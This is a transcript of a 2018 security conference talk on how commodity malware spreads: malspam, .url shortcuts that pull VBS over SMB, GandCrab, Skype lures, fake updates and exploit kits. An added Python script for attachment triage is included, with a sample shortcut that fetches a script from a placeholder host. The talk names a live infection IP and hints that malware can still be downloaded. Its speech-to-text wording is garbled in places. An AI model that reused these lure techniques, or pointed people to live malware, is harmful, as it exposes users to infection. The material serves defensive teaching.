
All right, good morning everyone. My name is Brad Duncan. I work for Palo Alto Networks Unit 42, and I'm here to talk to you about malware distribution trends. A little about myself: for those that don't know, I run the malware-traffic-analysis.net website, plenty of examples of infection traffic from malware and actual malware samples. If you're actually going to get copies of the malware from the site, beware: this is live stuff, and you don't want to accidentally detonate it on some Windows host that you're using. And I also tweet quite frequently at @malware_traffic, usually just the stuff that I'm posting on the blog. Occasionally I'll tweet about something like BSides Iowa going on today, and then every once in a while just some really off-the-wall joke that makes you think I'm socially [inaudible].

Disclaimer on this: I run into a lot of commodity malware, stuff that's not APT, stuff that's not specifically targeted. That's kind of a different area that we're looking at here. What I'm discussing is the stuff that is mass distribution, the stuff that goes out indiscriminately, that's not really necessarily targeted. That's weird, okay: that's not necessarily targeted, but you could very well get it. If we're talking malicious spam, a lot of this stuff gets hit by your, you know, through the spam filters, which we'll never see. Now, the spam filters are definitely a good way to get malware samples that would otherwise hit your organization, and if you've got access to that, if you actually work a security job where you have access to emails and the spam queue, check through it. You might be surprised; there's some good stuff through there.

But the stuff I'm going to talk about is hopefully all limited to early April 2018, so hopefully it's timely. Things can and do quickly change. For example, two months ago at BSides Tampa I gave a talk on how ransomware was really on the downturn. There was a serious, and there still kind of is, a serious lower level of ransomware at that time this year than there was a time before then; it was like you couldn't get away from ransomware. But now, as we go into April, I'm seeing a lot more ransomware than I was seeing in January of this year. So things can, and they do, quickly change. And personal bias, like I said: I tend to look at the commodity stuff, and that's definitely only part of the picture when you're talking about a specific malware threat to yourself or your organization.

So for today's talk we're going to look at the types of malware distribution methods. I'm gonna go over tech support scams briefly, those fake antivirus alerts that come up through your web browser, because we're seeing a lot more of those now
than we did about a year ago, and prevention strategies, what you guys can do to help prevent getting caught by malware.

So in wide-scale distribution we most often find information stealers and backdoors, the sneaky malware that you don't know is running on your computer; malware downloaders, that can download any one of those types of malware; cryptocurrency miners, a big thing that has really taken off in the past few months; and ransomware. So what do you guys think gets the most press coverage out of all those four categories that I have up there? Yeah. Now, if I had an explosion sound effect, they'd put it there with this particular graphic, because ransomware is a very relatable story on a human level. You've got stuff, and some criminals are holding it for ransom; that speaks to everybody. However, it tends to, the very nature of news stories, you want to get a hook to grab somebody's attention, right? So you're going to kind of play it to try and hook a reader's interest. And so my personal opinion is that we tend to play up ransomware in the open media a lot more than it is, you know, as far as the threat is concerned. There are other things out there that you should also be worried about, but the press generally tends to focus on ransomware because it's a good story.

Well, we all know about ransomware. I think by this point everybody knows what ransomware is. You, you know, get it through browsing the web, or you get an email, and you're a faceless white couple with a computer, and you have to pay money to a faceless criminal that is for some reason still wearing a mask. So it's fairly standard; I think we all know what ransomware is by now.

So we've seen a lot of high-profile stories in the past couple of years. The most recent one was in March: the city of Atlanta got hit by ransomware. They didn't specify what type it was; I think they think it's SamSam or Samas ransomware. And just earlier this week one of the reporters at WSB-TV in Atlanta reported that they shelled out nearly 2.7 million dollars, you know, following the ransomware incident. That probably has a lot more to deal with than just the ransomware; I'm sure there were some endemic system problems in the city of Atlanta. And, you know, it's a good number to throw out there; once again, it's a hook to catch your interest. If you actually look at the details, how much of that is specifically going to the ransomware case is a good question.

The Department of Health and Human Services: so far this year at least eight cyber attacks employing SamSam or Samas ransomware, they reported, have targeted healthcare and government organizations. In this case it really is targeted, because with SamSam or Samas ransomware your point of entry is a server. So you're trying to find a vulnerable server that you can exploit through automation. So if you have a server exposed to the internet and you're not fully patched or fully up to date, there's a vulnerability; you can imagine that it will sooner or later be exploited. And if you're the city of Atlanta, or one of the other organizations, commercial or government, that have been hit in the past few years by ransomware, it is generally because you didn't have your servers fully patched and up to date.
Now, Bitcoin is the general payment that we see for ransomware, and if you look at the price in 2017 there were some wild fluctuations. For the longest time Bitcoin was generally lower than $1,000 per Bitcoin, the exchange rate, and as the year went on, the last few months of last year, it really shot up. It was very volatile, the prices. So that is probably one of the reasons that we saw a decline in ransomware: there just was no stability in saying, okay, send me this amount of Bitcoin, because a day or two later the Bitcoin value will have fluctuated so rapidly that you're either getting far less than you originally asked for or far more, depending on the day. Fortunately, as we've gone into 2018 it's kind of stabilized. And it was funny when I see, you know, reports that Bitcoin has dropped to like six thousand US dollars per Bitcoin and they say it's a crash; I'm thinking, for the longest time Bitcoin wasn't even approaching that level.

Yes, sir? [audience question] And so that's correct. The question here was, when I mentioned earlier about servers exposed to the Internet, that it's not necessarily spear phishing, that it's not necessarily some of the other methods, that these organizations that we hear about have gotten infected with ransomware through. And I said generally, for the most part; that's not to say that that is the only vector, and I'll get into that here in a few minutes. So it's just that it's not something I go into in great detail here, because I don't have examples of that. If you're an organization and you have a server that gets compromised, you're generally not going to share all the intimate details on how it got compromised with the general public. So it really is kind of hard to get more detailed information on that. I can tell you about, you know, spear phishing, or just phishing in general; you can get examples of that fairly easily.

One of the types of malware that propagates, that
we'll see a lot of: we first saw this happen last year, in the spring or summer, when WannaCry or WannaCryptor came out, and it has been reported as spreading via SMB, Microsoft's SMB protocol, through what is called the EternalBlue exploit, which is when the Hacking Team was hacked, one of their... I'm sorry, not the Hacking Team, it's, I believe, the NSA exploit, right? So somehow the criminals had gotten a hold of that and were able to implement it into this ransomware. Now, the interesting thing about WannaCry is, while it was big news last year when we first saw it, we're definitely still seeing samples of that on a daily basis. So as a researcher at Palo Alto Networks I've got access to VirusTotal Intelligence, which, apparently if your company is not paying for it, is very expensive. So I'm fortunate enough to look through that, and I can actually search through there on anything with WannaCry in the description or the VirusTotal detections of the antivirus vendors, and anything that is first seen since April 1st. So when I look through that, they stopped counting at a thousand, so more than a thousand samples, new file hashes, that have come through here. I'm not sure what's been tweaked, but we're seeing stuff that is at least identified by some of the antivirus vendors as WannaCry, and just looking at the general size and the types of files, it seems to fall in line with what I've seen before.

Now also, my employer has a tool called AutoFocus, and as a security researcher I've got access to that, and I can look at the same thing. In this case I'm looking at anything that we have tagged as some sort of ransomware, and I'm pulling for anything that was first seen after April 1st at 12 a.m.: 26,000 samples that we're seeing of ransomware. So it is really a lot more now than we saw back in January, which is, I think, less than half that. So the samples that are tagged WannaCry or WannaCryptor that we have identified at Palo Alto Networks: 2,500. And then GandCrab, anybody? How many people have not heard of GandCrab at this point? And I'll go through that here momentarily. GandCrab is a new family of ransomware that started appearing back in January, but the majority of ransomware samples, not the vast majority but just the majority, over half of that, is WannaCryptor or GandCrab.

Now, GandCrab is interesting. GandCrab, when it encrypts your files, adds .crab as a file extension, and "gand" is slang in India for "butt," I believe, so I tend to refer to it personally as butt crab ransomware, but everybody else calls it GandCrab. So you infect a host, which I did on Thursday evening, and all the encrypted files are appended with .crab. It throws up the decryption instructions, and it throws up a window to Tor so you can download the Tor browser, because if you had the Tor browser installed, sitting on your desktop, it was encrypted. So $1,500 US. And the interesting thing about GandCrab, when it asks for that money, is that it asks you to pay for it in a cryptocurrency called Dash. Now Dash, and that was big news when it came out, it was like, okay, there's a big move away from Bitcoin, everybody's moving to Dash. Now, you know, there was only one family of ransomware, to my knowledge, that uses Dash specifically as a cryptocurrency for your ransom payment. And so three hundred and fifty dollars for one Dash, and one thousand five hundred dollars... now you can still pay in Bitcoin, all right, you can pay in Bitcoin, but you've got a 15% service charge, so you're paying, what is it, 1,650 dollars, I'm sorry, that's 10%, but anyway, you're paying about $1,700 or so. So ultimately ransomware is still out there, and it is doing a little bit of an uptick since I saw this low back in December and January.

An interesting thing here is yesterday, yesterday afternoon, This Week in Ransomware was reporting about a ransomware called PUBG that made you play PlayerUnknown's Battlegrounds in order to decrypt your files. It's a joke, a joke ransomware; I always find those interesting. But even with the media attention on ransomware, we still see the vast majority of stuff that we run across is not ransomware; it's information stealers, it's malware downloaders, and cryptocurrency miners, which were largely reported at the beginning of the year and now are fairly commonplace. We still see them; I generally don't run into them much on the mass distribution side, on the stuff that I end up looking at.

But how does malware get from the criminal to us? Email, the web, social media, and attackers
breach networks or servers and drop the malware. I'm not going to talk about that fourth one, because as I explained earlier I generally don't have any of the technical details or the information on that stuff. Social media, I've got a story that I'll share with you, but mostly we're looking at email and the web for mass distribution of malware, not APT-style attacks.

And email is the most common method, hands down, that criminals use to distribute malware by volume. It doesn't mean that the email actually makes it to the intended recipients. But for example, how many people, for like their Gmail or Yahoo or whatever you use, do you get the pill spam, you know, Viagra, Cialis? For some reason that stuff just gets to you. That just means that your email is on a list, all right? Your email is on the list and it gets spread around, and so if your email is on a list and it's spread around to the pharmaceutical spammers, it could very well end up in the hands of people that are actually trying to send malware out there. If you've got a Gmail account, you will probably not see any actual malware, because they generally have a good method of filtering for malware. You've got Yahoo, maybe a little less so. You've got AOL, God help you.

So these emails contain archives with malware executables, which is very common and very easily blocked; Microsoft Office documents, Word, PowerPoint, Excel; rich text files that exploit Microsoft Office, a big thing that we started seeing a couple years back. And a significant percentage, definitely not a majority by far, but a significant percentage of the stuff that I see out there is some type of RTF attachment to emails, or a link to an RTF document, that will exploit a vulnerability in Microsoft Office. Normally these have been patched, you know, for months, but these guys are still sending out these emails in the hopes of capturing some unpatched Windows XP machine or something. Another favorite is archives with any of those file types, so for example Java archives: you've got a JAR file, and you double-click it, and it does its thing, it backdoors your computer using Java. And then there are, just as often, links to malware, right? So you've got, you know, I'll show an example here, but you have an email that says, you know, look at this invoice, click here; you go there and download the file, and then you open it, and it's a decoy, and you're infected.

So my favorite one of the link-type malspam campaigns is what's called Hancitor, or Chanitor, or Tordal. This is a malware that uses macros in a Word document to infect your
computer. And macros is pretty common, because you're trusting the user to, the average user's inclination to click through warnings to get to what they want to see. I'm not talking about anybody here in this room, or hopefully anybody watching the video here; I'm talking about the general user, and I think we all know a few of them, and have run into... I had one guy tell me, you know me, I'm a clicker guy. But so this was back on Wednesday of this previous week, from the Hancitor campaign. You got a link, and there are a number of domains that they'll have there, and so you got, in this case, one six six four six dot com, question mark, there's a string of characters, equals another string of characters, and that second string of characters represents an encoding that I haven't figured out yet, and nobody I've talked to has quite figured out yet; it's encoding, it represents the recipient's email address. So if you click on that link, the server that sends you the malware also records, okay, this is the email address of whoever, you know, clicked that link. So they're actually keeping track of who downloads their malware. But yeah, you click on the link and it says, hey, here's your invoice, and there's a number of templates that they'll use in these documents that basically tell you, hey, in order to view the content, you know, enable macros, and here's how you do it, because by default Microsoft Office will not enable macros. However, you know, certain people, organisations, may have disabled that, in which case these directions are pretty much meaningless. But for most people you'll see some sort of message that says, hey, enable your macros and see the content. And of course you don't see the content, you don't see it at all, it just has the same messaging; you figure, well, okay, I'll close it, but you're getting infected behind the scenes unless macros have been disabled.

And every once in a while you'll get a link, or you'll get an attachment that says it's a document; it's actually a rich text file with some code, and usually these are exploiting things that have already been patched with Microsoft Office. So for example, if you're running Windows 10 and you've got a good setup to where, you know, you're getting those patches whether you want them or not, with Windows 10 you're getting patched for Microsoft Office and the various operating system components that they've found vulnerabilities in. But these are the general CVEs that I'm seeing for the vulnerabilities that are being exploited by these Word documents, at least according to VirusTotal when they tag them. There's, what is it, the Microsoft Equation Editor vulnerability, that's a 2018 CVE, but I always forget what that is, because people don't call it by the CVE, they call it the Equation Editor vulnerability. Be consistent, for crying out loud.

Here's another one from earlier this week. This one, I believe, is Brazilian malspam, and so it has a zip archive attachment, and that zip archive attachment is "whatsapp," except they misspelled WhatsApp, if you notice right there, so, you know, that generally is a red flag, if you will. Another red flag: when you open that archive, open that zip file, you get something that's not VBS. Now what is the default setting for file extensions for Windows? Yeah, you hide them. So at best people are going to see, in the default configuration, they're going to see .pdf, and they'll think, even though the icon is clearly not a PDF icon, they'll double-click it. And if you look at the code, it's highly obfuscated JavaScript code, and it will download malware. I forget what the case was in this instance, but I just needed an example for today's presentation on that type of malware, that type of distribution method, which I see quite frequently; I just didn't have any easy examples from this past week.

However, I did find some examples of malspam pushing GandCrab ransomware. I'm sorry, this is not GandCrab; this is a different one, from the Necurs botnet campaign, which is a very long-running campaign that uses various
methods. So in this case, and this was from earlier this month, the senders were all spoofed. So after the at sign was your recipient's email domain, right? So if this went to somebody at Palo Alto Networks and somehow made it to the recipient, it would be emily2018 at paloaltonetworks.com, "photo from Emily," "photo from Lea." The attachment names are all some sort of supposed image. And if you look at these emails, and this is common for the Necurs botnet, they will have a very standard template, or in this case no message text at all; it was kind of weird. So you open this up and you find that it's an actual URL file. Now, the interesting thing about URL files: if you look at them in Microsoft Windows, it doesn't even give you the option of looking at the file extension. No matter what your settings are, you're not seeing that .url; you're just seeing that "Sh 2018 no 404" or "BBD baa." So certainly the average person who is looking at this on Microsoft Windows is not going to see the code inside, and not going to understand that this is actually a URL that will point to somewhere on the internet. Now if you look here, the URL is not http, for web traffic; it's file, colon, backslash, backslash. So what protocol is that? SMB, you're right. What port? 445, TCP port 445. So that is generally what you're going to see. And the interesting thing about this is, I checked on Thursday night, when I was putting the finishing touches on this show, and I went in on a Windows host in my lab environment, and I was able to find those VBS files sitting on the server, 60 of them, 60 of them in that directory, in the "stream" directory. There's another one on the server, and if you guys are curious, if you've got a Windows host you want to check it out, yeah, you can find 60 examples of malware, probably right now as I'm speaking. If you're watching the video, probably, hopefully, it'll be offline.

So I went through most of the follow-up domains, because basically you've got that URL file, it's pulling the VBS file from a server over SMB, and then you run that VBS file and it will again grab, through HTTP, the actual malware binary. So I checked a few of them out on Thursday night, and, you know, no luck, no luck, no luck, wait, here's one. And so taxi heavy Cu is a site that's legitimate but compromised, from what I can tell, and it was hosting malware as of Thursday evening when I checked. So I think if anybody wants to grab a copy of the malware, you might still be able to do it by using that URL. So I ran this in my test environment. I got post-infection traffic: 92.53.77.184, port 80, HTTP post-infection traffic, to roro double-dot im, and the characteristics of this traffic matched Quant Loader, which is what the Necurs botnet was pushing. Now Quant Loader is just a malware downloader; it backdoors into your computer and will download some additional malware. And no, it's a couple letters changed; it's not Quant Loader, it's Squanch Loader, at least that's what they call it on Planet Squanch. Ultimately, there are many different types of files used by criminals to install malware.
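The attachment tricks described above (a .url shortcut whose target is a file:// SMB share, double extensions that Windows hides by default, and script or executable attachments, including inside a zip) can be checked mechanically at the mail gateway or in a triage script. The following Python is an added example, not code from the talk or from Palo Alto Networks; the host address, filenames and zip contents in it are constructed placeholders.

```python
"""Triage email attachments for the delivery tricks described in the talk.

Added example, not code from the talk or Palo Alto Networks. Checks:
  - .url shortcuts whose target is file:// (fetched over SMB, TCP/445)
  - double extensions (invoice.pdf.vbs) that Explorer shows as "invoice.pdf"
  - script/executable attachments (.scr, .jar, .vbs, .js, ...), also inside zips
Samples at the bottom are constructed; the host is a placeholder, not an IoC.
"""
import configparser
import io
import zipfile
from urllib.parse import urlparse

# Extensions Windows executes; Explorer hides them with default settings.
EXEC_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "vbe",
             "js", "jse", "wsf", "wsh", "hta", "jar", "ps1"}
# Harmless-looking extensions used as the visible decoy before the real one.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt"}


def classify_name(filename):
    """Findings for a bare attachment filename (no content inspection)."""
    findings = []
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return findings
    last = parts[-1]
    if last in EXEC_EXTS:
        findings.append(f"executable/script extension .{last}")
        if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
            findings.append(
                f"double extension: shown as .{parts[-2]} when extensions are hidden")
    if last == "url":
        findings.append(".url shortcut (Explorer never shows this extension)")
    return findings


def inspect_url_file(data):
    """Parse an [InternetShortcut] body and flag targets that are not plain web URLs."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(data.decode("utf-8", errors="replace"))
    except configparser.Error:
        return ["unparseable .url file"]
    target = cp.get("InternetShortcut", "URL", fallback=None)
    if target is None:
        return ["no URL= entry in .url file"]
    # file:\\host\share\x.vbs is the backslash form seen in the talk; normalise it.
    parsed = urlparse(target.replace("\\", "/"))
    findings = []
    if parsed.scheme == "file":
        host = parsed.netloc or "local path"
        findings.append(f"file:// target fetched over SMB (TCP/445) from {host}: {target}")
        findings.extend(classify_name(parsed.path.rsplit("/", 1)[-1]))
    elif parsed.scheme not in ("http", "https"):
        findings.append(f"unexpected scheme {parsed.scheme!r}: {target}")
    return findings


def triage_attachment(filename, data):
    """Combine name and content checks for one attachment."""
    findings = classify_name(filename)
    low = filename.lower()
    if low.endswith(".url"):
        findings.extend(inspect_url_file(data))
    elif low.endswith(".zip"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    inner = info.filename.rsplit("/", 1)[-1]
                    findings.extend(f"inside archive, {inner}: {f}"
                                    for f in classify_name(inner))
        except zipfile.BadZipFile:
            findings.append("corrupt or non-zip .zip attachment")
    return findings


def build_samples():
    """Constructed attachments modelled on the talk's examples (placeholders)."""
    url_body = (b"[InternetShortcut]\r\n"
                b"URL=file:\\\\203.0.113.10\\stream\\SH_2018.vbs\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("whastapp.pdf.vbs", "WScript.Echo 1")   # misspelt decoy name
    return {
        "photo_from_emily.url": url_body,
        "whastapp.zip": buf.getvalue(),
        "new_hairdo.jpg.scr": b"MZ",
        "invoice.pdf": b"%PDF-1.4",
    }


def triage_all(samples):
    """Run triage over a {filename: bytes} mapping and return findings per file."""
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all(build_samples()).items():
        print(name, "->", findings or ["no findings from these checks"])
```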
Malicious spam with links is harder to catch by intrusion detection systems across the board, at least that's been my experience. It's a lot easier if you've got that malware in the email; you can generally block it. If you've just got a link to something, it's a little harder, and sometimes that will slip past systems. And some types of malware have defense systems that will act differently if you're analyzing, so if it knows it's being analyzed. Now, I've been tricked by this before, because, especially if I'm on the road, I'll generally use my laptop, and one of my environments is VMware, and I ran it one time and got caught by a malware called Bedep, which I don't see anymore
but I was seeing a lot of it last year, and it actually acted differently. In most cases the malware just won't run if it detects it's being analyzed, but in some cases, like in the case of Bedep last year, I was getting completely different traffic, so it really threw me off. So you've got to be careful of that.

Distribution through social media. How many people here do not have any sort of social media account? Whoo, one, two, three. Lord, you guys are the outliers. Social media, generally like email, you'll generally see what I tend to think of as mass distribution, but with a lot of social media platforms you've got to somehow connect with somebody; you can't just spam stuff out there like you can through email, right? So in the case of Skype, you have to be connected to somebody on Skype before they can send you something that's a link to malware, in which case it's pretty common. It generally tends to be female names; I'm sure the criminals are not female, or they could be, I don't want to be sexist, but you'll get something, usually something like, hey, here's a picture of me, do I look okay, or I just got a new hairdo, or something that is just so vastly stereotypical baiting to click a link, you know, for some lonely, lonely guy, I guess. And nope, I'm sorry, that wasn't mine, my bad. So in this case, once again, the default for Windows is to hide the file extensions, so you're not going to see that .scr, which is a screen saver, which basically is just another executable, right? And this isn't even a screensaver; this is just an executable file with the .scr file extension that's hidden on the default settings in Windows. So you double-click that, and you're saying, where's my picture? How am I gonna know if her hairstyle is better or not? I don't even know the woman; she just friended me an hour ago. But with social media, because you've got to connect with people somehow, generally social media tends to be a little more targeted than regular mass distribution methods.

And so I've got an interesting story about this. Back in August 2016, when we were seeing a lot of ransomware, there was a lot of news coverage that was just annoying me, and, to your point earlier, there were some hospitals that got hit by, I think it was Locky ransomware, which isn't in the scene now, but that is generally spread through emails. And I believe in one article they had mentioned something like a spray-and-pray attack, right? Well, they sprayed it out there, and I'm thinking, it's not an attack, right? You got hit with ransomware because you were unaware enough to double-click on a link. It was something that you did; it's not something that the criminal did any differently, it's something that you did differently, well, you did unknowingly, unaware. So I was saying, stop calling it a ransomware attack, start calling it an incident, because in cybersecurity, in this field, the word incident has serious connotations. However, for a lot of people that think of an incident, it's just something that happens. So I got a lot of blowback from this. I got a lot of comments, and one of the comments was from somebody that tagged themselves as Sarah the Enthusiast, who wrote a very well-reasoned response, I thought, and said that... and, you know, this is the Internet, so I don't know if this person is actually named Sarah or not, but she or he, whoever it is, said that: "I think this type of malware is becoming so increasingly popular that even the most careful Internet users can be tricked into downloading and opening a link." So this person was the victim of a ransomware attack two days before she or he wrote this, and the hoax was so elaborate, because this person thought there was so much trouble that they went to to get her to download and click this file.

So, long story short, Sarah the Enthusiast is a freelance writer, got contacted about a writing assignment on freelancer.com, and as part of the process connected with a Skype account of a person that she researched and thought, okay, this is a legitimate Skype account. And it was, but it was compromised; it was being used by a criminal to rope in people, right? So Sarah the Enthusiast is thinking, oh, that's a lot of effort to get me to click on something, but I'm sure the person who had compromised this Skype account was trying to fool more than one person, right? So as part of the process Sarah the Enthusiast gets a bunch of files, PDF files, company guidelines, the writing assignment guidelines, and something that's an .exe file. Now Sarah's no dummy, so Sarah, actually not realizing that the Skype account was compromised, contacts the Skype account and says, hey, I see this is a malware, I'm sorry, this is an executable, this is kind of weird, you're not trying to infect me, are you, ha ha. And of course the criminal behind the Skype account said, hey, this is just part of a new format that we're using. And so Sarah the Enthusiast double-clicked on that executable and got infected with ransomware. And I say this: luckily got infected with ransomware, because it could be far worse. It could be an information stealer, it could be a banking Trojan, which in my personal opinion is worse, because they're able to steal all your passwords. If this is straightforward ransomware, all they're doing is encrypting files on your machine. However, you do have to make the assumption that, oh, if they infected my machine, they could very well have taken my passwords and login account credentials. But I'd like to share that story because how many of us in this room think that, you know, it'd just be too much trouble for somebody to target us in that fashion? Now, understanding it's not really necessarily targeting, but going through a bunch of work to get us to click, double-click in a Windows environment, on an executable file. We probably don't think we're that important, but we don't have to be. As long as they can scale their operations up, any one of us can be a
target of those criminals, as long as they can scale their operations up.

So for distributing malware through the web, there are generally two types of methods. There are the unexpected web pages or pop-up windows, all right; in that case you actually have to do something, to click or install something, to be infected. And then there are exploit kits, which... I gave a talk about exploit kits here at BSides Iowa last year and had mentioned then they were on the wane, and that certainly has held true.

So here's an example of a campaign that I had seen and I'd documented on my blog, just some technical, some pcaps and some malware samples, and Malwarebytes actually did a good write-up on this relatively recently; I forget exactly what they called it. But so in this case you've got a compromised website, and there's injected code, and it redirects you to this fake Flash Player if you're using Internet Explorer, and of course you'll get plenty of warnings that this type of file is not something you want to double-click, but, you know me, I'm a clicker. You look at the code of the file that you download: it's highly obfuscated JavaScript, in this case run by Windows Scripting Host, and it's designed to check your computer. And I never was able to infect a host in a virtual environment with this; I actually had to go through a physical environment, because it had some checks that were making sure that whoever double-clicked that file was not in a virtual environment. If you're running Chrome, you'll actually, from hitting the same website and going through the same process, you won't have Flash, because Chrome doesn't use Flash, so you get the same type of file, different file name. Using Firefox, it says, hey, you're using an older version of Firefox, even though I wasn't, and then it gives you the same type of file. Now, when I first tried this out, all of those file names were the same exact file hash; however, a couple weeks later when I checked it again, they were all different file hashes, slightly different. And it is relatively easy for criminals, when they're compiling their malware, to put a little bit of randomization in the process, just enough to add a couple spaces here, a couple of characters there, and make your file hash different. Which is why earlier, when I was saying that on that query I did on my company's tool I saw more than 26 thousand samples of ransomware, you know, that just means 26 thousand different file hashes; a lot of those were pretty much the same thing, just every single time you downloaded it, it was a new file hash, but it did the same exact thing.

But exploit kits, which once again I did talk about here last year, are a way to infect your computer behind the scenes. So basically you're just doing regular web browsing, and you hit, in most cases nowadays that's ad traffic, some banner ad has some injected code, it directs you to an exploit kit server behind the scenes, and it will send code, it will check to see if your browser-based components are vulnerable, and infect your computer. Here is my standard definition for exploit kits: web servers that use exploits that target vulnerabilities in browser-based applications, right? So it has to be a browser-based application. So if you're using Java, if you're using Flash, if you're using Internet Explorer... Does anybody still use Internet Explorer?
I'm not saying it doesn't happen is anybody by choice using internet but so interestingly enough Java and PDF those are big 2010 called they want their exploits back and you just don't see this stuff as much anymore Flash Player is generally the only Flash Player and Internet Explorer are the two that generally get exploited by what remains in the exploit kids scene and this is literally what you're talking about as far as the infection chain you've got a normal website this could be CNN this could be the New York Times this could be any high profile web site that buys ad traffic and I should say that that gets paid to air at traffic and then the
banner ads which are not as as thoroughly vetted as content on the site itself actually has the stuff you'll have a gate it's just another server that kind of keeps an eye on things and you know tries to make sure that you're not coming from the same ip address multiple times you know your security researcher or something like that it's a good way to avoid it but exploit kids are really on the wane so when I talked about it in April of last year we had seen markedly lower levels than the year before and now it's probably about a tenth of that now now I have never been able to use any of the current exploit
kits to infect a Windows 10 host even even running Internet Explorer which you can do on Windows 10 Microsoft edge and I know it can be done I know it has been done I just personally haven't been able to do it and good guide Chrome it's they really keep on top of things as far as making sure that exploit kits tile infections where it's happening behind the scenes without your knowledge is not happening right --chrome will still happily let you you know pop up those windows and say hey install this Chrome update because your Chrome is out of date but X what kits are because of that you know many people use groan and yeah
that sort of stuff is on the wane so in addition to malware what some criminals have done is instead of directing you to download and install a fake flash update or something they'll say hey you've got your computer is infected so while you you get on one of these and it happens the same way it's the same chain instead of going to an exploit kit you're basically going to a page that has this faked update and you can't close your browser unless you go your task manager and you kill that particular process so it's easy enough to get out of there every once in a while my wife will run across these I'm like you got to stop
browsing to these to these gambling sites she doesn't gamble I'm just kidding honey so that I'm sorry you know this this is in chrome right so chrome doesn't stop this sort of stuff in generally I say chrome doesn't stop this sort of stuff but in my lab environment I specifically you know change the settings in chrome so it isn't blocking suspicious websites so I I revised that my environment doesn't block those so if you go to Windows that the same thing you get a slightly different looking thing with Internet Explorer and you'll get a window that pops up you'll try and close the window and it will not close it will just pop back up and once again
you got to go into task manager to to kill that process if you're going at the same website through Firefox it will actually ask you for username and password I'm astounded why would nono but anyway if anybody feels curious enough it's not going to hurt your computer it's just going to lock your browser up and you'll have to kill that process you could probably go to this URL right now if you're curious once again for the official record I don't recommend it prevention strategies how do we stop this stuff from getting to us or for the people that we are responsible for protecting not really a prevention strategy you're talking about regular backups so if you do get hit and this
this could be ransomware but any type of decent disaster recovery plan because you could get hit by a tornado here in Iowa and you can lose all your stuff if you don't have your stuff your your critical data backed up you'll never recover it whether it's ransomware or whether it's some other sort of disaster Apache systems keep your systems patched and up-to-date as far as the software now this is kind of common sense and for the home user we generally don't have to worry about that but sometimes in an enterprise environment you're still forced to use Internet Explorer or you know use a now to date version of Java you know because a particular mission
critical application requires it training and awareness if you don't understand the types of threats you face if you don't know what a phishing email is you'll probably click on it and be tricked so how many people have been fished by your company to test and see if you recognize it it's kind of common there they're a good ways of doing it there are bad ways the bad way is to make you feel like an idiot if you actually click the link and that's not what it's all about it's about trying to raise your awareness browsing restrictions if you like porn if you like online gambling you even like illegal file sharing and you to the internet for that stuff you're
probably going to run into some shady websites that may direct you to malware so if you restrict yourself from browsing that stuff you'll be much much better situation if you're in a company and you've got some sort of web filtering you would hopefully be filtering out at least those three categories of web traffic and then security solutions so if you are if you're not looking at what's happening in your network you will never know if you have been compromised or in some cases when you were compromised and it's pretty much it we've covered the types of malware distributional methods tech support scams and prevention strategies and I'm not going to waste time here with questions however I will be around if
anybody does have any questions afterwards I'll be more than happy to answer them thank you very much [Applause]